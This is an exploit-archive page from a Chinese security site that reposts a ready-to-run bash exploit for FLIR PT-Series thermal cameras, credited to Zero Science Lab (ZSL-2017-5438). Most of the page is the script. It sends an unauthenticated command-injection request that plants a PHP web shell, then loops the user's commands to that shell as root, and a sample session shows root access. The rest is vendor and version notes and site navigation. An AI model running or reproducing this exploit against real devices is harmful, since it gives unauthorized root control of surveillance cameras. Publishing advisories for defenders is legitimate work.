首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Ex
来源:https://www.zeroscience.mk 作者:LiquidWorm 发布时间:2017-09-26  

#!/bin/bash
#
#
# FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) Remote Root Exploit
#
#
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.flir.com
# Affected version: Firmware version: 8.0.0.64
#                   Software version: 10.0.2.43
#                   Release: 1.3.4 GA, 1.3.3 GA and 1.3.2
#
# Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras
# bring thermal and visible-light imaging together in a system that gives you
# video and control over both IP and analog networks. The PT-Series' precision
# pan/tilt mechanism gives you accurate pointing control while providing fully
# programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.
# PT-Series cameras define a new standard of performance with five models that
# provide full 640x480 thermal resolution.
#
# Desc: FLIR Camera PT-Series suffers from multiple unauthenticated remote command
# injection vulnerabilities. The vulnerability exist due to several POST parameters
# in controllerFlirSystem.php script when calling the execFlirSystem() function not
# being sanitized when using the shell_exec() PHP function while updating the network
# settings on the affected device. This allows the attacker to execute arbitrary system
# commands as the root user and bypass access controls in place.
#
# ========================================================
#
# bash-3.2$ ./flir0.sh 10.0.0.10 8088
#
# Probing target: http://10.0.0.10:8088
#
# Status: 200
# Target seems OK!
# You got shell!
# Ctrl+C to exit.
#
# [root@FLIR ~]# id;pwd;uname -a
# uid=0(root) gid=0(root)
# /var/www/data/maintenance
# Linux FLIR 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082 #1 Wed May 1 12:25:27 PDT 2013 armv5tejl unknown
# [root@FLIR ~]# ^C
# bash-3.2$
#
# ========================================================
#
# Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
#            Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
#            Nexus Server/2.5.29.0
#            Nexus Server/2.5.14.0
#            Nexus Server/2.5.13.0
#            lighttpd/1.4.28
#            PHP/5.4.7
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5438
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5438.php
#
#
# 23.03.2017
#


set -euo pipefail
IFS=$'\n\t'

if [ "$#" -ne 2 ]; then
 echo -e "Usage: $0 ipaddr port\\n"
 exit 1
fi

ip=$1
port=$2
echo -e "\\nProbing target: http://$ip:$port\\n"

payload="dns%5Bdhcp%5D=%60echo+\"<?php+system(\\\\\$_GET['c']);?>\">test.php%60&dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D="
htcode=$(curl -Is -G http://"$ip":"$port"/maintenance/controllerFlirSystem.php -d"$payload" 2>/dev/null | head -1 | awk -F" " '{print $2}')

echo -ne "Status: "; echo "$htcode"

if [ "$htcode" == "200" ]; then
 echo "Target seems OK!"
else
 echo "Ajdee...something went wrong. Check your target."
 exit 1
fi

echo -e "You got shell!\\nCtrl+C to exit.\\n"

while true; do
 echo -ne "\\033[31m";
 read -rp "[root@FLIR ~]# " cmd
 echo -ne "\\033[00m";
 shell="http://$ip:$port/maintenance/test.php?c=${cmd// /+}"
 curl "$shell"
done


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Oracle 9i XDB 9.2.0.1 - HTTP P
·FLIR Systems FLIR Thermal Came
·Supervisor 3.0a1 - 3.3.2 - XML
·Disk Pulse Enterprise 10.0.12
·CyberLink LabelPrint < 2.5 - B
·Cash Back Comparison Script 1.
·DenyAll WAF < 6.3.0 - Remote C
·Stock Photo Selling 1.0 - SQL
·Microsoft Edge Chakra - 'Javas
·Microsoft Edge Chakra - 'Parse
·Microsoft Edge Chakra - Deferr
·Microsoft Edge - Chakra Incorr
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved